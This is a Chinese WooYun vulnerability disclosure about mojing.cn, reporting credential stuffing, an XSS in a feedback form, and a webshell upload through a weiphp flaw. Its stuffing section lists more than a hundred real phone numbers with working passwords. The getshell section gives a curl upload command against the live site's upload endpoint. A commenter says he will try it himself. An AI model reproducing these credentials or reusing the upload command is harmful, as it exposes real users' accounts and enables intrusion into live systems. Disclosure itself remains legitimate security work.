漏洞概要

缺陷编号: 2016-204957

漏洞标题: 暴风魔镜多处漏洞打包(撞库/xss/Getshell)

相关厂商: mojing.cn

漏洞作者: 千机

提交时间: 2016-05-04 15:36

公开时间: 2016-06-18 15:40

漏洞类型: 成功的入侵事件

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: [email protected]

Tags标签: webshell webshell webshell


漏洞详情

披露状态:

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

简要描述:

RT,键盘表哥收到了礼物,我也来一发

详细说明:

首先是撞库,成功撞出了一大堆的账户

登录处未做次数以及验证码处理

282.png



code 区域
Payload1	Payload2	Length
13846177646 sdhoujie01 887
18180093239 wan6290012 884
13123276688 ninng183 882
13737026362 19770625 876
18291957456 zyh262509 876
15577110761 Dc19880717 876
18633762327 nnd86amc 874
13721477762 aini1314 872
18576432432 qq6935868 871
15659931773 hedaoqin55 868
13897463679 w96104216 868
18965665560 whf214145 868
13555542401 0325511y 868
18245301237 z6521426 868
13830289123 1116qiyang 861
18952455047 19881120 860
18020733707 fs0408039 860
15651767055 198566 860
18641191660 5624110 860
13915528614 Lh7758521 860
18735376992 lxx4424586 860
13336920317 a65476298 860
18628278998 yang6638253 860
18571471440 ps13388 860
15241766922 shishuai21 860
13581522846 asdf888 860
18883286082 a43630642 860
15800295032 a123456 860
13676799770 wsczh0418 860
13883649807 c83399780 860
13429232187 hzj1993523 855
15264728945 qq4252426 854
13777274896 w8892w63 852
18968180726 1714131211 852
13846071539 wj584521 852
13760341694 6209321 852
13770914589 zhang1984 852
13819272323 1925852625 852
15959025900 ilovebin 852
13264228811 77582589a 852
18621600258 qcx282 852
15030412563 11111a 848
15961078309 q8614789 848
18977150556 6841698 845
18078275817 qq4366456 844
15982557785 lixinxing 844
18511821121 61428202 844
18934311307 liyi801219 844
15129190467 watzx1314 842
15986989274 xwh5201314 841
15292319879 20052134 840
15166750959 19970721 840
15642877000 760219 840
13865041970 zjmzzl123 840
15775822345 520wenjie 840
13523649911 zhouyuan77 840
13736491447 992892323 840
18013730125 yinlei520 840
13549850518 830614 840
13424377369 19840420 840
13241814968 zmsx11 840
13877336700 ssdy931422 840
13600893906 z8356056 840
13525127305 www123456 840
13728072746 a5362257 840
15988438505 lxj620 840
18357363092 jy19900820 839
18694049554 q543203447 839
13099898899 zxcv1234 839
13241233214 sn6331907 838
13834904042 jj19810427 838
13738073127 alex1123 838
15250581862 ai198797 838
13717788554 197951 838
13410105357 a8895578 838
15800616740 134679 838
13722050101 364762298 838
18621704979 weed00 838
15629082135 1988927zs 838
13658502233 xushaoyuna 838
18805727654 yk890102 838
15277940262 11121314a 838
15073389123 a250275701 838
15018514831 swsw000 838
18073115125 19841224o 838
13784035359 ch820714 838
15961765073 a9880630 838
13698712331 3434158lyf 838
13919791750 1990127ybs 838
18621891698 liwei1981 838
13378120671 qw27764991 838
13223076570 8853qq 837
15935229909 19862188a 836
13728444422 a2639902 836
18626318507 3391929 835
15682138005 95ll10 835
15030091377 5461628 835
13817798135 zsh123 835
13828084568 hjj619000 835
18377906611 lby199061 835
13846467035 wwkfghy520 835
15653811505 gao123456 834
13872839824 123a123a 834
13422898453 7333133 833
13874408393 zl810315 833



这些账户都能登录

283.png



284.png



然后是xss,

存在于魔镜开发者平台的反馈处

code 区域
http://open.mojing.cn/developer/feedback/submit



285.png



286.png



然后是getshell,这个弄了好久,又学到了新姿势

code 区域
http://weixin.mojing.cn/index.php?s=/Home/User/login/from/1.html



这个后台是用weiphp开发的

参考这个漏洞

code 区域
 WooYun: weiphp3.0微信开发框架前台getshell第二弹(无需登录) 



先在本地弄个shell文件

287.png



然后通过以下这个命令将shell上传上去

code 区域
curl -F '[email protected]' http://weixin.mojing.cn/index.php?s=/Home/File/uploadPicture/



成功上传shell

288.png



289.png



290.png



291.png

漏洞证明:

291.png

修复方案:

改改改

版权声明:转载请注明来源 乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-04 15:38

厂商回复:

感谢您提交的漏洞,我们会尽快修复。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2016-05-04 17:31 | Mazing ( 路人 | Rank:27 漏洞数:7 )
    0

    啊。我也去碰碰运气

    1# 回复此人